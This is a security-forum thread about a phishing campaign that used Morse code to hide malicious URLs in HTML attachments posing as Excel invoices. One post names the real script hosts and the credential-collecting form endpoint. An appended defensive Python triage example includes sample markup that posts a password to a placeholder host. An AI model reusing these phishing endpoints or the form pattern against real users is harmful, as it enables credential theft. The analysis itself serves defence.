New phishing attack uses Morse code to hide malicious URLs

Discussion in 'other security issues & news' started by Minimalist, Feb 7, 2021.

  1. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,909
    Location:
    Slovenia, EU
  2. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,296
    Location:
    Europe
    Why would you open an html file from an unknown person...

    And c'mon, someone would really open an html file IN THE BROWSER and then think, oh this is Microsoft Excel program, totally not the browser that I just opened an html file with??

    It doesn't even matter morse code or not, if you open an html file from an unknown person AND THEN THINK IT'S MICROSOFT EXCEL you deserve to get phished. Unless you are an old grandma or grandpa, then you are forgiven :D
     
  3. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,102
    Location:
    Canada
    NS with Restrictions disabled:

    XSS Warning.png
     
  4. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,648
    Location:
    U.S.A.
     
  5. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,846
    Location:
    Italy
    In Italy this phishing attack on companies would be unlikely.
    We use electronic invoicing sent to the Tax Agency via a certified interchange system.
    Very rarely is the electronic invoice, in XML format, sent via certified e-mail (PEC).
    Any courtesy invoice that is sent to the company almost exclusively in PDF format has no legal value.
    So there is no reason for interaction.
     
  6. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,296
    Location:
    Europe
  7. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,102
    Location:
    Canada
    Not sure what you mean. I was just illustrating how NS can detect XSS attempts.
     
  8. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,296
    Location:
    Europe
    There was no link mentioned in the article, where did you go to receive that notification?

    I assume you personally tested it yourself by editing the DOM on google.com?
     
  9. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,102
    Location:
    Canada
    No, I just typed out one of the scripts from the link provided by the OP, then copied/pasted it into the address bar from the Google home page. NoScript alerted to the XSS attempt.
     
  10. Floyd 57

    Floyd 57 Registered Member

    Joined:
    Mar 17, 2017
    Posts:
    1,296
    Location:
    Europe
    To be honest, that JS by itself was safe. You can check the contents if you go to it, http://coollab.jp/dir/root/p/434.js, and then you unescape the content.

    upload_2021-2-12_18-57-41.png

    Same for http://coollab.jp/dir/root/p/09908.js
    upload_2021-2-12_18-58-47.png

    It is really that bit over here, the form action, that is the dangerous part. When you submit the form, it carries out the action described in the link http://www.tanikawashuntaro.com//cgi-bin/root-6544323232000/0453000.php?90989897-45453 which is now down (or we lack permissions to view it).

    So NoScript technically did nothing, because the script could have simply been pasted in the body instead of referring to a link with the script itself. But of course, that would not have circumvented the email filters.
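
Added example, not part of the thread or any poster's code: a static triage of an HTML attachment along the lines of the post above, listing remote script sources and remote form targets and percent-decoding escaped script text so it can be read without running it. The sample markup, the `example.test` hosts and all function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Constructed sample attachment; hosts are placeholders, not taken from the thread.
SAMPLE_ATTACHMENT = """<html><body>
<script src="http://scripts.example.test/p/1.js"></script>
<form action="http://collector.example.test/cgi-bin/post.php?id=1" method="post">
<input type="text" name="user"><input type="password" name="pass">
</form></body></html>"""

# Constructed stand-in for the escaped body of a remotely hosted script.
SAMPLE_ESCAPED_JS = "document.write(unescape('%3Cdiv%20id%3D%22login%22%3E%3C/div%3E'));"

def _is_remote(url):
    # A locally opened attachment has no origin of its own, so any
    # http(s) or scheme-relative URL points off the machine.
    return bool(url) and (urlparse(url).scheme in ("http", "https") or url.startswith("//"))

class AttachmentTriage(HTMLParser):
    """Collect remote script sources and remote form targets; nothing is executed."""

    def __init__(self):
        super().__init__()
        self.remote_scripts, self.form_targets = [], []
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and _is_remote(a.get("src")):
            self.remote_scripts.append(a["src"])
        elif tag == "form" and _is_remote(a.get("action")):
            self.form_targets.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True

def triage(html_text):
    p = AttachmentTriage()
    p.feed(html_text)
    p.close()
    return {
        "remote_scripts": p.remote_scripts,
        "form_targets": p.form_targets,
        # A password field posted to a remote host is the part that does the damage.
        "credential_post": bool(p.form_targets) and p.has_password_field,
    }

def unescape_js(source):
    """Percent-decode escaped script text for reading (%uXXXX sequences are left as-is)."""
    return unquote(source)
```

The form target is reported whether or not any script loads, which matches the point that blocking the remote script alone leaves the form's POST destination in place.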
     